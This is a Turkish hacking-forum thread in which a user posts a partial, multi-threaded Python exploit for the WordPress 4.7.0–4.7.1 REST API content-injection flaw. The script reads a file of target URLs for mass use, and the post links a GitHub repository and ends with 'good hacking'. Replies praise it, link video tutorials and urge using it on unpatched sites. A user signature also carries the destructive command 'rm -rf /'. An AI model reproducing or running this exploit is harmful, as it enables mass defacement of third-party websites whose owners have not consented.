0day Wordpress Exploit şimdi Multi-Threading!

Hacknology

Kıdemli Üye
25 Eki 2015
2,712
11
rm -rf /
[COLOR="WhiteYeni çıkan 0day exploitten haberiniz vardır. Ben de python versiyonunu sizin için multi-threading hale getirdim. Böylece çok daha hızlı sonuca varabileceksiniz. Güzel hacklemeler!
[code]import json
import sys
import urllib.request
from threading import Thread
try:
import pip
except ImportError:
import os
s = urllib.request.urlopen("https://bootstrap.pypa.io/get-pip.py").read()
dosya = open("get-pip.py", "w").write(s)
os.system(sys.executable + " get-pip.py")
def yukle(modul):
pip.main(['install', modul])
try:
from lxml import etree
except ImportError:
print("[*]lxml modülü bulunamadı. Sizin için otomatik olarak yüklüyorum")
yukle("lxml")

def get_api_url(file):
dosya = open(file, 'r')
dosya.readlines()
for wordpress_url in dosya:
response = urllib.request.urlopen(wordpress_url)

data = etree.HTML(response.read())
u = data.xpath('//link[@rel="https://api.w.org/ [URL="https://tik.lat/z6972"] https://github.com/Hacknology/0dayexploit-reedit[/URL]
Edit: Kullanımda url yerine urllerinizin bulunduğu txt nin adını girmelisiniz
(Örnek: abc.txt)
Edit2: Leopic sağolsun bulmuş internetten videosunu
[ame="https://m.youtube.com/watch?v=62t9bpMue7k
 
Son düzenleme:

Leopic

Yaşayan Forum Efsanesi
26 Şub 2016
9,948
10
Biraz Kafa Karıştırıcı, video çekebilir misiniz?


Bu exp.'i kaçırmaman gerekiyor öncelikle süper bir exploit.


Burda Detaylı anlatımını @hacknology dostum vermiş zaten ek olarak : https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html




WordPress 4.7.0'da son eklenen ve varsayılan olarak etkinleştirilen WordPress REST API'sını etkiliyor. Yani 4.7.0 4.7.1 güncellemelerinden sonra bu exploiti bu tür sitelerde kullanman kaçınılmaz olur.




Daha net anlaman için sana 3-4 tane video bırakayım ;





[ame]https://www.youtube.com/watch?v=eTwm4hTvaRA[/ame]


[ame]https://www.youtube.com/watch?v=62t9bpMue7k[/ame]


[ame]https://www.youtube.com/watch?v=8DR8_kU-_TU[/ame]


[ame]https://www.youtube.com/watch?v=TMVHOkPOGic[/ame]



bunun dışında zaten @Hacknology multi-threading haline getirmiş. Haliyle size çok kolaylık sağlamış. Videolardan yola çıkarak kullanımını anlıyabilirsin.
 
Son düzenleme:

Hacknology

Kıdemli Üye
25 Eki 2015
2,712
11
rm -rf /
Bu exp.'i kaçırmaman gerekiyor öncelikle süper bir exploit.


Burda Detaylı anlatımını @hacknology dostum vermiş zaten ek olarak : https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html




WordPress 4.7.0'da son eklenen ve varsayılan olarak etkinleştirilen WordPress REST API'sını etkiliyor. Yani 4.7.0 4.7.1 güncellemelerinden sonra bu exploiti bu tür sitelerde kullanman kaçınılmaz olur.




Daha net anlaman için sana 3-4 tane video bırakayım ;





https://www.youtube.com/watch?v=eTwm4hTvaRA


https://www.youtube.com/watch?v=62t9bpMue7k


https://www.youtube.com/watch?v=8DR8_kU-_TU


https://www.youtube.com/watch?v=TMVHOkPOGic



bunun dışında zaten @Hacknology multi-threading haline getirmiş. Haliyle size çok kolaylık sağlamış. Videolardan yola çıkarak kullanımını anlıyabilirsin.


Çok teşekkürler dostum, senin de emeğine sağlık
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.